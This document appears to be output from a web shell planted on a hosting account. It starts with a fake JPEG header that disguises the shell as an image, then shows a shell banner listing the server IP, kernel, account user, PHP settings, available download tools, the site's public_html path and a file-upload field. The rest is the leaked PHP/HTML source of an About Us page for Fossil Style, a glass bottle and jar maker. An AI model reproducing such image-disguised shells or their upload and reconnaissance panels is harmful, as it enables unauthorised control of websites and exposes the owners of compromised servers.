���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.218 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/fossilstyle.com/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>About Us</title> <?php include 'assets.php'; ?> </head> <body> <?php include 'header.php'; ?> <!-- Breadcrumb Section Start --> <section class="breadcrumb-section pt-0"> <div class="container-fluid-lg"> <div class="row"> <div class="col-12"> <div class="breadcrumb-contain"> <h2>About Us</h2> <nav> <ol class="breadcrumb mb-0"> <li class="breadcrumb-item"> <a href="index.php"> <i class="fa-solid fa-house"></i> </a> </li> <li class="breadcrumb-item active">About Us</li> </ol> </nav> </div> </div> </div> </div> </section> <!-- Breadcrumb Section End --> <section class="fresh-vegetable-section section-lg-space"> <div class="container-fluid-lg"> <div class="row gx-xl-5 gy-xl-0 g-3 ratio_148_1"> <div class="col-xl-6 col-12"> <div class="row g-sm-4 g-2"> <div class="col-6"> <div class="fresh-image-2"> <div class="bg-size blur-up lazyloaded" style="background-image: url("assets/images/about2.jpg"); background-size: cover; background-position: center center; background-repeat: no-repeat; display: block;"> <img src="assets/images/about2.jpg" class="bg-img blur-up lazyloaded" alt="" style="display: none;"> </div> </div> </div> <div class="col-6"> <div class="fresh-image"> <div class="bg-size blur-up lazyloaded" style="background-image: url("assets/images/about1.jpg"); background-size: cover; background-position: center center; background-repeat: no-repeat; display: block;"> <img src="assets/images/about1.jpg" class="bg-img blur-up lazyloaded" alt="" style="display: none;"> </div> </div> </div> </div> </div> <div class="col-xl-6 col-12"> <div class="fresh-contain p-center-left"> <div> <div class="review-title"> <h2>About Us – Fossil Style</h2> </div> <div class="delivery-list"> <p class="text-content">Established in 2018, Fossil Style is a trusted name in the glass packaging industry, specializing in clear glass bottles, glass jars, and candle glass jars. We are dedicated to providing high-quality, durable, and elegantly designed glass products that cater to a wide range of industries, including beverages, food storage, home décor, and candle-making. At Fossil Style, we prioritize precision craftsmanship and innovation, ensuring that each product meets the highest industry standards. Our glass bottles and jars are made using premium-grade raw materials, offering clarity, strength, and eco-friendly solutions for businesses and individuals alike. With a customer-centric approach, we focus on delivering products that are aesthetically appealing, functional, and competitively priced. Our team of skilled professionals stays updated with the latest trends and manufacturing techniques, allowing us to provide customized solutions tailored to your specific needs.</p> </div> </div> </div> </div> </div> </div> </section> <section class="client-section section-lg-space"> <div class="container-fluid-lg"> <div class="row"> <div class="col-12"> <div class="about-us-title text-center"> <h4>What We Do</h4> <h2 class="center">We are Trusted by Clients</h2> </div> <div class="slider-3_1 product-wrapper slick-initialized slick-slider"> <div class="slick-list draggable"> <div class="slick-track" style="opacity: 1; width: 1161px; transform: translate3d(0px, 0px, 0px);"> <div class="slick-slide slick-current slick-active" data-slick-index="0" aria-hidden="false" tabindex="0" style="width: 387px;"> <div class="clint-contain"> <div class="client-icon"> <img src="assets/svg/3/work.svg" class="blur-up lazyloaded" alt=""> </div> <h2>10</h2> <h4>Business Years</h4> <p>Fossil Style was established in 2018 and has been a trusted name in the glass packaging industry for over 6 years. we continue to provide premium glass bottles, jars, and candle glass jars to businesses worldwide.</p> </div> </div> <div class="slick-slide slick-active" data-slick-index="1" aria-hidden="false" tabindex="0" style="width: 387px;"> <div class="clint-contain"> <div class="client-icon"> <img src="assets/svg/3/buy.svg" class="blur-up lazyloaded" alt=""> </div> <h2>80 K+</h2> <h4>Products Sales</h4> <p>Fossil Style offers a wide range of durable and elegantly designed glass packaging solutions tailored to meet your industry needs.</p> </div> </div> <div class="slick-slide slick-active" data-slick-index="2" aria-hidden="false" tabindex="0" style="width: 387px;"> <div class="clint-contain"> <div class="client-icon"> <img src="assets/svg/3/user.svg" class="blur-up lazyloaded" alt=""> </div> <h2>90%</h2> <h4>Happy Customers</h4> <p>customer satisfaction is at the heart of everything we do. We take pride in delivering high-quality glass bottles, jars, and candle jars that enhance businesses and brands worldwide</p> </div> </div> </div> </div> </div> </div> </div> </div> </section> <?php include 'footer.php'; ?>